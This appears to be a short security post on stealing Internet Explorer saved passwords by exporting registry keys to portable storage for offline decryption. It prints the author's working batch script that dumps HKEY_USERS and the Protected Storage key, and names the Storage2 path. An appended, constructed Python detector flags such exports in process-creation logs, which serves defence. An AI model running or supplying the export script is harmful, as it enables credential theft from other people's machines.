There is nothing stopping an attacker from exporting IE password files to another machine. This would be useful if a program like Symantec were stopping you from using other tools on the local machine. All an attacker needs is a jump drive or other portable storage device. A script can be created that saves the encrypted registry values to their flash drive. Then they can import the passwords onto their own machine and use tools to decrypt them. This is a copy of my script:
@echo off
REM search for storage2 in ie7
mkdir ie_info
mkdir ie_info\%computername%
regedit /E ie_info\%computername%\ie7.reg "HKEY_USERS" > NUL
regedit /E ie_info\%computername%\ie6.reg "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\" > NUL
The IE 7 passwords are stored in the following path:
HKEY_USERS\\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
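
For defenders, the exports in the script above show up in process-creation logging. The following is an added example, not part of the original post: it flags `regedit /E` exports of the keys named here, run over constructed events whose field names follow Sysmon Event ID 1. Treating a working directory off the system drive as portable storage is an assumption.

```python
import re

# Key paths named in the post. Exporting the HKEY_USERS root also captures
# every loaded user's Storage2 key, so the bare root counts as a hit.
CRED_KEYS = (r"\intelliforms\storage2", r"\protected storage system provider")
HIVE_ROOTS = {"hkey_users"}
TOKEN = re.compile(r'"([^"]*)"|(\S+)')  # one quoted or bare argument


def classify(event, system_drive="C:"):
    """Return a finding for a process-creation event, or None if not a hit."""
    args = [q or b for q, b in TOKEN.findall(event["CommandLine"])]
    if not args or args[0].lower().rsplit("\\", 1)[-1] not in ("regedit", "regedit.exe"):
        return None
    if not any(a.lower() == "/e" for a in args[1:]):
        return None  # not an export
    reasons = []
    for arg in args[1:]:
        key = arg.rstrip("\\").lower()
        if key in HIVE_ROOTS:
            reasons.append("whole-hive export")
        elif key.startswith("hkey_") and any(k in key for k in CRED_KEYS):
            reasons.append("credential key export")
    if not reasons:
        return None
    # Assumption: a working directory off the system drive suggests the
    # script was launched from portable storage, as the post describes.
    cwd = event.get("CurrentDirectory", "")
    off_system = bool(cwd) and not cwd.upper().startswith(system_drive)
    return {"reasons": reasons, "severity": "high" if off_system else "medium"}


# Constructed sample events (host PC01, drive E: and the SID are invented).
EVENTS = [
    {"CommandLine": r'regedit  /E ie_info\PC01\ie7.reg "HKEY_USERS"',
     "CurrentDirectory": "E:\\"},
    {"CommandLine": r'regedit  /E ie_info\PC01\ie6.reg "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\"',
     "CurrentDirectory": "E:\\"},
    {"CommandLine": r'regedit /E C:\backup\run.reg "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"',
     "CurrentDirectory": "C:\\Windows"},
    {"CommandLine": r'C:\Windows\regedit.exe /e out.reg "HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Internet Explorer\IntelliForms\Storage2"',
     "CurrentDirectory": "C:\\Users\\alice"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(classify(e), "<-", e["CommandLine"])
```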